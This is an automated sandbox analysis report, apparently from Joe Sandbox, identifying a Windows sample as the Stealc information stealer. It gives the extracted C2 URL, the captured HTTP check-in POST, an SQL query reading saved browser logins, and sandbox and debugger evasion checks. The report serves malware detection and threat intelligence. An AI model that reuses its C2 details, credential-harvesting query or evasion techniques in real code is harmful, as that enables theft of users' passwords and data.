
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520803
MD5: 725d70229eb4ef1cb992cafa8a031527
SHA1: 69af2b2f4a85e3ce78f5b9a9484bb7a3f13ca5ff
SHA256: edc9cb8db3fafd7737aeda3122a8a4b967cf4e79887ef38910dcfd6b2e99b635
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 725D70229EB4EF1CB992CAFA8A031527)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches (Source | Rule | Description | Author | Strings)
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2044296444.0000000005280000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5064 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5064 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.8a0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-09-27T23:14:03.397773+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


                AV Detection

                Source: file.exeAvira: detected
                Source: 0.2.file.exe.8a0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_008AC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_008A9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008A7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_008A9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_008B8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_008ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_008AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_008AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AF68A FindFirstFileA,0_2_008AF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_008ABE70

                Networking

                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 38 33 41 46 34 42 44 33 45 38 32 30 37 38 35 38 38 37 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="hwid"6183AF4BD3E82078588720------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build"save------CAEHDBAAECBFHJKFCFBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_008A4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 38 33 41 46 34 42 44 33 45 38 32 30 37 38 35 38 38 37 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="hwid"6183AF4BD3E82078588720------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build"save------CAEHDBAAECBFHJKFCFBF--
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6Y3
                Source: file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpOF
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37DW

                System Summary

                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF0_2_00C741DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D311CF0_2_00D311CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF11D30_2_00BF11D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6F1600_2_00C6F160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B482970_2_00B48297
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6BA4D0_2_00C6BA4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C58B200_2_00C58B20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF5CAF0_2_00CF5CAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6346D0_2_00C6346D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C79EC30_2_00C79EC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C726CC0_2_00C726CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69E830_2_00C69E83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D07E510_2_00D07E51
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6D61F0_2_00C6D61F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7AF400_2_00C7AF40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C77F640_2_00C77F64
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 008A45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mpdgfduh ZLIB complexity 0.9948087686567164
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_008B8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_008B3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\U64Q21ZR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1871872 > 1048576
                Source: file.exeStatic PE information: Raw size of mpdgfduh is bigger than: 0x100000 < 0x1a2c00

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.8a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mpdgfduh:EW;rbtrtnga:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mpdgfduh:EW;rbtrtnga:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cebea should be: 0x1d6c68
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mpdgfduh
                Source: file.exeStatic PE information: section name: rbtrtnga
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D988D1 push ebx; mov dword ptr [esp], eax0_2_00D98937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D490C8 push esi; mov dword ptr [esp], eax0_2_00D490D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1389C push 24C9C08Ah; mov dword ptr [esp], edx0_2_00D138A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF50A9 push 112FC669h; mov dword ptr [esp], edi0_2_00CF50D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA204F push edi; mov dword ptr [esp], esp0_2_00CA20F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6407D push 6E293919h; mov dword ptr [esp], esp0_2_00D640EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0407E push 1502BB9Dh; mov dword ptr [esp], ecx0_2_00D03EFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0407E push 4BE90CEFh; mov dword ptr [esp], eax0_2_00D04100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BB035 push ecx; ret 0_2_008BB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDF034 push edi; mov dword ptr [esp], 20C32B69h0_2_00CDF04B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ecx; mov dword ptr [esp], 3DBDB44Ch0_2_00C741FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 5DCFC69Fh; mov dword ptr [esp], esi0_2_00C7429D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push edx; mov dword ptr [esp], 4C0A0D33h0_2_00C742E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 0FC4316Ah; mov dword ptr [esp], esi0_2_00C74355
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 73695A81h; mov dword ptr [esp], ecx0_2_00C74418
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ebp; mov dword ptr [esp], ebx0_2_00C744DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push edx; mov dword ptr [esp], ecx0_2_00C74555
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 13E53EF0h; mov dword ptr [esp], ecx0_2_00C74600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push esi; mov dword ptr [esp], 4E2B8EFAh0_2_00C7460E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ecx; mov dword ptr [esp], edi0_2_00C74627
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 43EEA6F9h; mov dword ptr [esp], ecx0_2_00C74679
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 56AB94FBh; mov dword ptr [esp], esi0_2_00C74733
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push edi; mov dword ptr [esp], 739F3788h0_2_00C74749
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 1F8C2E76h; mov dword ptr [esp], esi0_2_00C747A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ecx; mov dword ptr [esp], 68A69B82h0_2_00C74802
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push 5A2666C4h; mov dword ptr [esp], ecx0_2_00C7483A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push esi; mov dword ptr [esp], edx0_2_00C74863
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push eax; mov dword ptr [esp], 5A94B987h0_2_00C74877
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ebp; mov dword ptr [esp], ecx0_2_00C7490C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push ebp; mov dword ptr [esp], ecx0_2_00C7491E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C741DF push esi; mov dword ptr [esp], ecx0_2_00C7496A
                Source: file.exeStatic PE information: section name: mpdgfduh entropy: 7.9541059476777995

                Boot Survival

                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B9860

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13646
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F079 second address: C7F09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FB97CFE9222h 0x0000000f je 00007FB97CFE9216h 0x00000015 je 00007FB97CFE9216h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007FB97CFE9216h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F09E second address: C7F0AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FB97CFF0156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F328 second address: C7F338 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB97CFE9216h 0x00000008 js 00007FB97CFE9216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F64E second address: C7F66B instructions: 0x00000000 rdtsc 0x00000002 je 00007FB97CFF015Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB97CFF015Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F66B second address: C7F66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F66F second address: C7F693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FB97CFF0156h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F693 second address: C7F69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F829 second address: C7F835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FB97CFF0156h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F835 second address: C7F84C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F84C second address: C7F850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F850 second address: C7F854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F854 second address: C7F866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFF015Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81E94 second address: C81E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81E98 second address: C81E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C81E9C second address: C81EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
